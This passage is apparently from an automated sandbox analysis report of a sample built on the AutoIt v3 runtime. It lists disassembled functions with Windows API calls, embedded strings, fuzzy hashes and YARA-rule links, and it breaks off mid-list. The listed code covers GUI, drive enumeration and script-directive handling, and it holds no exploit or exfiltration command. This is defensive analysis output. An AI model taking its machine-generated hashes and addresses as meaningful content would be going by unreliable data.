Instruction Fuzzy Hash: 7AD17F30204245DBCB14EF11C895BAEB7E1FF94354F1085ACB8965B3A2CB71EE4ADB41

Uniqueness

Uniqueness Score: -1.00%

Function 00C377BE Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00C377F1
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00C378B0
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00C378EE
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00C37900
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00C37946
GetClientRect.USER32(00000000,?), ref: 00C37952
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00C37996
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00C379A5
GetStockObject.GDI32(00000011), ref: 00C379B5
SelectObject.GDI32(00000000,00000000), ref: 00C379B9
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00C379C9
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C379D2
DeleteDC.GDI32(00000000), ref: 00C379DB
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00C37A07
SendMessageW.USER32(00000030,00000000,00000001), ref: 00C37A1E
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00C37A59
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00C37A6D
SendMessageW.USER32(00000404,00000001,00000000), ref: 00C37A7E
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00C37AAE
GetStockObject.GDI32(00000011), ref: 00C37AB9
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00C37AC4
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00C37ACE

Strings

static, xrefs: 00C37990, 00C37AA8
msctls_progress32, xrefs: 00C37A4F
DISPLAY, xrefs: 00C3799B
AutoIt v3, xrefs: 00C3793E
@U=u, xrefs: 00C37A0D

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: @U=u$AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-2771358697
Opcode ID: 2af356e89d142cbb2443fb355a1d68821aa0d646a3f00eae3dedd243a26b402c
Instruction ID: 111a5e79847cc97a92c2a0b95770a6b0cbbd72950e2b3534d2977fb545c9d6ee
Opcode Fuzzy Hash: 2af356e89d142cbb2443fb355a1d68821aa0d646a3f00eae3dedd243a26b402c
Instruction Fuzzy Hash: 21A16FB5A40215BFEB14DBA4DC4AFAF7BB9EB49710F004158FA15A72E0C774AD01CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00C4AB60 Relevance: 47.5, APIs: 26, Strings: 1, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00C4AB99
SetTextColor.GDI32(?,?), ref: 00C4AB9D
GetSysColorBrush.USER32(0000000F), ref: 00C4ABB3
GetSysColor.USER32(0000000F), ref: 00C4ABBE
CreateSolidBrush.GDI32(?), ref: 00C4ABC3
GetSysColor.USER32(00000011), ref: 00C4ABDB
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C4ABE9
SelectObject.GDI32(?,00000000), ref: 00C4ABFA
SetBkColor.GDI32(?,00000000), ref: 00C4AC03
SelectObject.GDI32(?,?), ref: 00C4AC10
InflateRect.USER32(?,000000FF,000000FF), ref: 00C4AC2F
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C4AC46
GetWindowLongW.USER32(00000000,000000F0), ref: 00C4AC5B
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C4ACA7
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00C4ACCE
InflateRect.USER32(?,000000FD,000000FD), ref: 00C4ACEC
DrawFocusRect.USER32(?,?), ref: 00C4ACF7
GetSysColor.USER32(00000011), ref: 00C4AD05
SetTextColor.GDI32(?,00000000), ref: 00C4AD0D
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00C4AD21
SelectObject.GDI32(?,00C4A869), ref: 00C4AD38
DeleteObject.GDI32(?), ref: 00C4AD43
SelectObject.GDI32(?,?), ref: 00C4AD49
DeleteObject.GDI32(?), ref: 00C4AD4E
SetTextColor.GDI32(?,?), ref: 00C4AD54
SetBkColor.GDI32(?,?), ref: 00C4AD5E

Strings

@U=u, xrefs: 00C4ACA7

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID: @U=u
API String ID: 1996641542-2594219639
Opcode ID: 30ead184f96c980a178aa623cf9174f2b6cbdc1c6b90580590e081cc02f926cb
Instruction ID: abda049930d7328affda55c2ff290e4c8abf603772cea97e6b39792ee2a908d6
Opcode Fuzzy Hash: 30ead184f96c980a178aa623cf9174f2b6cbdc1c6b90580590e081cc02f926cb
Instruction Fuzzy Hash: C8616C75900218EFDB119FA8DC48FAE7BB9FB09320F118129F915AB2A1D7719E41DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00C2AF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00C2AF89
GetDriveTypeW.KERNEL32(?,00C4FAC0,?,\\.\,00C4F910), ref: 00C2B066
SetErrorMode.KERNEL32(00000000,00C4FAC0,?,\\.\,00C4F910), ref: 00C2B1C4

Strings

SCSI, xrefs: 00C2B131
SSA, xrefs: 00C2B14D
Virtual, xrefs: 00C2B18C
iSCSI, xrefs: 00C2B169
ATA, xrefs: 00C2B13F
Network, xrefs: 00C2B0A4
MMC, xrefs: 00C2B185
1394, xrefs: 00C2B146
USB, xrefs: 00C2B15B
SSD, xrefs: 00C2B0F1
RAMDisk, xrefs: 00C2B090
ATAPI, xrefs: 00C2B138
Fibre, xrefs: 00C2B154
PhysicalDrive, xrefs: 00C2B012
\\.\, xrefs: 00C2AFDB
Unknown, xrefs: 00C2B086, 00C2B12A
SATA, xrefs: 00C2B177
Removable, xrefs: 00C2B0B8
RAID, xrefs: 00C2B162
FileBackedVirtual, xrefs: 00C2B193
SAS, xrefs: 00C2B170
Fixed, xrefs: 00C2B0AE
CDROM, xrefs: 00C2B09A

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 2b39ffba3e9639756bcb8457f6d50261588c890fd1504402157e73aabf32e96b
Instruction ID: 60232adfcac01f36783db6492c19c9a4e0c4903c111be2e6894a70b19abdb99b
Opcode Fuzzy Hash: 2b39ffba3e9639756bcb8457f6d50261588c890fd1504402157e73aabf32e96b
Instruction Fuzzy Hash: EE51E530684715ABCB08DB11ED92EBD73B0FF947817208069F41EA7A90CB75AE51DB42

Uniqueness

Uniqueness Score: -1.00%

Function 00BC6A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00BC6A91
__wcsnicmp.LIBCMT ref: 00BC6AA9
__wcsnicmp.LIBCMT ref: 00BC6AC1
__wcsnicmp.LIBCMT ref: 00BC6AD9
__wcsnicmp.LIBCMT ref: 00BC6AF1
__wcsnicmp.LIBCMT ref: 00BC6B09
__wcsnicmp.LIBCMT ref: 00BC6B21
__wcsnicmp.LIBCMT ref: 00BC6B35
__wcsnicmp.LIBCMT ref: 00BC6B76
__wcsnicmp.LIBCMT ref: 00BC6B8A
__wcsnicmp.LIBCMT ref: 00BC6B9E
__wcsnicmp.LIBCMT ref: 00BC6BB2

Strings

Cannot parse #include, xrefs: 00BFE819
#comments-end, xrefs: 00BC6B98
#include, xrefs: 00BC6B03
#ce, xrefs: 00BC6BAC
#comments-start, xrefs: 00BC6B1B, 00BC6B70
Bad directive syntax error, xrefs: 00BFE743
#cs, xrefs: 00BC6B2F, 00BC6B84
Unterminated group of comments, xrefs: 00BFE82C
#include-once, xrefs: 00BC6AEB
#OnAutoItStartRegister, xrefs: 00BC6AD3
#requireadmin, xrefs: 00BC6ABB
#notrayicon, xrefs: 00BC6AA3
#pragma compile, xrefs: 00BC6A8B

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 340f5aef10e64abad50e110da1aa9d039b483cc447466d2210ef07dea5d1b94c
Instruction ID: ece0324abe9ef05a579b336cc568e76afc49e8e5229f09ab557d53ab101b1a3a
Opcode Fuzzy Hash: 340f5aef10e64abad50e110da1aa9d039b483cc447466d2210ef07dea5d1b94c
Instruction Fuzzy Hash: C681F770640245ABCB20BB61CC93FBE77D8EF15700F0440B9F946AB192EB60EE95C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 00C48C44 Relevance: 40.7, APIs: 21, Strings: 2, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00C48D34
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C48D45
CharNextW.USER32(0000014E), ref: 00C48D74
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00C48DB5
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00C48DCB
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C48DDC
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00C48DF9
SetWindowTextW.USER32(?,0000014E), ref: 00C48E45
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00C48E5B
SendMessageW.USER32(?,00001002,00000000,?), ref: 00C48E8C
_memset.LIBCMT ref: 00C48EB1
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00C48EFA
_memset.LIBCMT ref: 00C48F59
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00C48F83
SendMessageW.USER32(?,00001074,?,00000001), ref: 00C48FDB
SendMessageW.USER32(?,0000133D,?,?), ref: 00C49088
InvalidateRect.USER32(?,00000000,00000001), ref: 00C490AA
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C490F4
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C49121
DrawMenuBar.USER32(?), ref: 00C49130
SetWindowTextW.USER32(?,0000014E), ref: 00C49158

Strings

0, xrefs: 00C490C2
@U=u, xrefs: 00C48D34, 00C48D45, 00C48D7A, 00C48DF9, 00C48E5B, 00C48E8C, 00C48EFA, 00C48F83, 00C48FDB, 00C49088

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0$@U=u
API String ID: 1073566785-975001249
Opcode ID: f3d4f99a11700843ae0dc0b03a79d247777173d0377e43eb56863dfa71423209
Instruction ID: 5cd51dc660692b7cfd128ba0179eca06082456cac12d87e5835b459338674e43
Opcode Fuzzy Hash: f3d4f99a11700843ae0dc0b03a79d247777173d0377e43eb56863dfa71423209
Instruction Fuzzy Hash: EBE18174901219ABDF209F51CC88FEF7BB9FF05714F108199F9299A291DB708A85DF60

Uniqueness

Uniqueness Score: -1.00%

Function 00C44B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00C44C51
GetDesktopWindow.USER32 ref: 00C44C66
GetWindowRect.USER32(00000000), ref: 00C44C6D
GetWindowLongW.USER32(?,000000F0), ref: 00C44CCF
DestroyWindow.USER32(?), ref: 00C44CFB
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00C44D24
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C44D42
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00C44D68
SendMessageW.USER32(?,00000421,?,?), ref: 00C44D7D
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00C44D90
IsWindowVisible.USER32(?), ref: 00C44DB0
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00C44DCB
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00C44DDF
GetWindowRect.USER32(?,?), ref: 00C44DF7
MonitorFromPoint.USER32(?,?,00000002), ref: 00C44E1D
GetMonitorInfoW.USER32(00000000,?), ref: 00C44E37
CopyRect.USER32(?,?), ref: 00C44E4E
SendMessageW.USER32(?,00000412,00000000), ref: 00C44EB9

Strings

0, xrefs: 00C44BFC
(, xrefs: 00C44E2A
tooltips_class32, xrefs: 00C44D1D

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: e8ee5c1c89106518c25dedc6b2e83ea29e25032582e5bd9e1bbdde059477f8d3
Instruction ID: b9a3bf0e98f98a08794ff92b6949a79806d5d773ec5f7fe8b88906daf6d7e5b8
Opcode Fuzzy Hash: e8ee5c1c89106518c25dedc6b2e83ea29e25032582e5bd9e1bbdde059477f8d3
Instruction Fuzzy Hash: 12B17C71604341AFDB08DF24C889B5ABBE4FF85310F10891CF999AB2A1DB70ED05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00C246D6 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00C246E8
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00C2470E
_wcscpy.LIBCMT ref: 00C2473C
_wcscmp.LIBCMT ref: 00C24747
_wcscat.LIBCMT ref: 00C2475D
_wcsstr.LIBCMT ref: 00C24768
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00C24784
_wcscat.LIBCMT ref: 00C247CD
_wcscat.LIBCMT ref: 00C247D4
_wcsncpy.LIBCMT ref: 00C247FF

Strings

04090000, xrefs: 00C247BA
%u.%u.%u.%u, xrefs: 00C24862
DefaultLangCodepage, xrefs: 00C247E7
\VarFileInfo\Translation, xrefs: 00C2477C
StringFileInfo\, xrefs: 00C24757

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: 1948e58ca0b83abe80f65974fef272228bf043264c096ba6ee12ffabfb266c0d
Instruction ID: 65ec17418afc79c91fa577212cbf2ff27874bbdc872dd8729efea83f98a01cf8
Opcode Fuzzy Hash: 1948e58ca0b83abe80f65974fef272228bf043264c096ba6ee12ffabfb266c0d
Instruction Fuzzy Hash: A9413935A002517BDB14A7759C47FBF77ECEF41B10F0041BAF905E6182EB74EA0196A5

Uniqueness

Uniqueness Score: -1.00%

Function 00BC27D9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00BC28BC
GetSystemMetrics.USER32(00000007), ref: 00BC28C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00BC28EF
GetSystemMetrics.USER32(00000008), ref: 00BC28F7
GetSystemMetrics.USER32(00000004), ref: 00BC291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00BC2939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00BC2949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00BC297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00BC2990
GetClientRect.USER32(00000000,000000FF), ref: 00BC29AE
GetStockObject.GDI32(00000011), ref: 00BC29CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 00BC29D5

Part of subcall function 00BC2344: GetCursorPos.USER32(?), ref: 00BC2357
Part of subcall function 00BC2344: ScreenToClient.USER32(00C867B0,?), ref: 00BC2374
Part of subcall function 00BC2344: GetAsyncKeyState.USER32(00000001), ref: 00BC2399
Part of subcall function 00BC2344: GetAsyncKeyState.USER32(00000002), ref: 00BC23A7

SetTimer.USER32(00000000,00000000,00000028,00BC1256), ref: 00BC29FC

Strings

AutoIt v3 GUI, xrefs: 00BC2974
@U=u, xrefs: 00BC29D5

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: @U=u$AutoIt v3 GUI
API String ID: 1458621304-2077007950
Opcode ID: 57a3cbc2373204622fd9559234a0139393fda8e34ecbbbe3c1da8cab491de2a9
Instruction ID: 5d5581acf25d93fac1c43344e1d3c1eb4746fd1d5421e915ac110f4deb8f1a3f
Opcode Fuzzy Hash: 57a3cbc2373204622fd9559234a0139393fda8e34ecbbbe3c1da8cab491de2a9
Instruction Fuzzy Hash: E9B17B75A0020AEFDB14DFA8DD85FAE7BF4FB08315F108269FA15A7290CB74A841CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00C1C4C1 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 169windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00C1C4D4
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00C1C4E6
SetWindowTextW.USER32(?,?), ref: 00C1C4FD
GetDlgItem.USER32(?,000003EA), ref: 00C1C512
SetWindowTextW.USER32(00000000,?), ref: 00C1C518
GetDlgItem.USER32(?,000003E9), ref: 00C1C528
SetWindowTextW.USER32(00000000,?), ref: 00C1C52E
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00C1C54F
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00C1C569
GetWindowRect.USER32(?,?), ref: 00C1C572
SetWindowTextW.USER32(?,?), ref: 00C1C5DD
GetDesktopWindow.USER32 ref: 00C1C5E3
GetWindowRect.USER32(00000000), ref: 00C1C5EA
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00C1C636
GetClientRect.USER32(?,?), ref: 00C1C643
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00C1C668
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00C1C693

Strings

@U=u, xrefs: 00C1C4E6

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID: @U=u
API String ID: 3869813825-2594219639
Opcode ID: 34160fe9094ff997bf128f4d7b9372d82667e86a023b90b64e90c502b2e9775d
Instruction ID: 11595fa20bd1782fa4bcbf3571f1194f46dced7e1f0125874ecedc0bf0ac0473
Opcode Fuzzy Hash: 34160fe9094ff997bf128f4d7b9372d82667e86a023b90b64e90c502b2e9775d
Instruction Fuzzy Hash: 10515E70900709AFDB20DFA8DE85BAEBBF5FF05705F00492CF696A25A0C774A945DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00C44069 Relevance: 30.0, APIs: 3, Strings: 14, Instructions: 283windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00C440F6
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00C441B6

Strings

SELECTALL, xrefs: 00C4421D
SELECT, xrefs: 00C44250
SELECTINVERT, xrefs: 00C44286
FINDITEM, xrefs: 00C44329
GETTEXT, xrefs: 00C4415F
GETSUBITEMCOUNT, xrefs: 00C44141
DESELECT, xrefs: 00C442A4
SELECTCLEAR, xrefs: 00C44235
@U=u, xrefs: 00C441B6, 00C441E8
ISSELECTED, xrefs: 00C441C1
GETITEMCOUNT, xrefs: 00C44128
GETSELECTEDCOUNT, xrefs: 00C44199
GETSELECTED, xrefs: 00C442E4
VIEWCHANGE, xrefs: 00C44375

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: @U=u$DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-1753161424
Opcode ID: 862e9350b85eb438613252c3e14b31979eb8d296895d6509837526f35e9eaf23
Instruction ID: 7bce1dd4733e92767e19b4b3fe44f5be8946ca7c2b7cef1d93f1c1f2aeedae9c
Opcode Fuzzy Hash: 862e9350b85eb438613252c3e14b31979eb8d296895d6509837526f35e9eaf23
Instruction Fuzzy Hash: B8A19F702143019BDB18EF21C955F6AB3E5FF84314F2489ACB8AA9B2D2DB70ED45CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00C352F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00C35309
LoadCursorW.USER32(00000000,00007F8A), ref: 00C35314
LoadCursorW.USER32(00000000,00007F00), ref: 00C3531F
LoadCursorW.USER32(00000000,00007F03), ref: 00C3532A
LoadCursorW.USER32(00000000,00007F8B), ref: 00C35335
LoadCursorW.USER32(00000000,00007F01), ref: 00C35340
LoadCursorW.USER32(00000000,00007F81), ref: 00C3534B
LoadCursorW.USER32(00000000,00007F88), ref: 00C35356
LoadCursorW.USER32(00000000,00007F80), ref: 00C35361
LoadCursorW.USER32(00000000,00007F86), ref: 00C3536C
LoadCursorW.USER32(00000000,00007F83), ref: 00C35377
LoadCursorW.USER32(00000000,00007F85), ref: 00C35382
